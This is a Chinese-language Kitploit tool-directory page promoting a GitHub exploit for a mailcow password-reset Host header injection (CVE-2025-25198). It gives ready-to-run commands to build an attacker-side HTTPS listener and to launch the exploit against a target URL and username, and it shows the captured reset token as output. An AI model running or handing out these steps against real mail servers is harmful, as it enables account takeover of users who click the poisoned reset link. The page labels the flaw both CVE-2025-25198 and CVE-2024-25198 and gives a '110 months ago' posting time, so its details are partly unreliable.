Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-25198 — 捕获来自 Mailcow Host 头注入攻击的密码重置令牌。 | Kitploit
工具/GitHubGitHub/enzocipher/cve-2025-25198
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubenzocipher/cve-2025-25198

CVE-2025-25198

捕获来自 Mailcow Host 头注入攻击的密码重置令牌。

查看仓库
110个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2024-25198

mailcow: dockerized 是一个基于 docker 的开源群件/邮件套件。在 2025-01a 版本之前,mailcow 的密码重置功能存在一个漏洞,允许攻击者操纵 Host HTTP 头来生成指向攻击者控制域名的密码重置链接。如果用户点击该恶意链接,可能导致账户被接管。

工作原理?

设置一个 HTTPS 服务器来监听所有请求,并向网站发送带有您所选 <IP> 的 Host 头的 POST 请求。您也可以使用 Burpsuite 发送请求并在服务器上获取 Token。

功能特性

  • 可获取密码更改 Token 的 HTTPS 服务器
  • 攻击网站漏洞的利用脚本。
  • 已修复所有问题,不再需要 openssl 即可运行

前提条件

  • Go 1.16 或更高版本

服务器脚本

root@kitploit:~
git clone https://github.com/enzocipher/CVE-2025-25198.git
cd CVE-2025-25198
sudo go build -o https-server server.go
./https-server

利用脚本

root@kitploit:~
go mod init exploit
go mod tidy
sudo go run exploit.go --base <url> --username <[email protected]> --host <ip>:<port>  <--insecure | optional >

等待片刻后,服务器将输出您可以使用的 token:

root@kitploit:~
Redirigiendo a: http://mi-dominio.com/reset-password?token=F53F8F-CC7A5B-E0CC4C-98680B-A72245
下载工具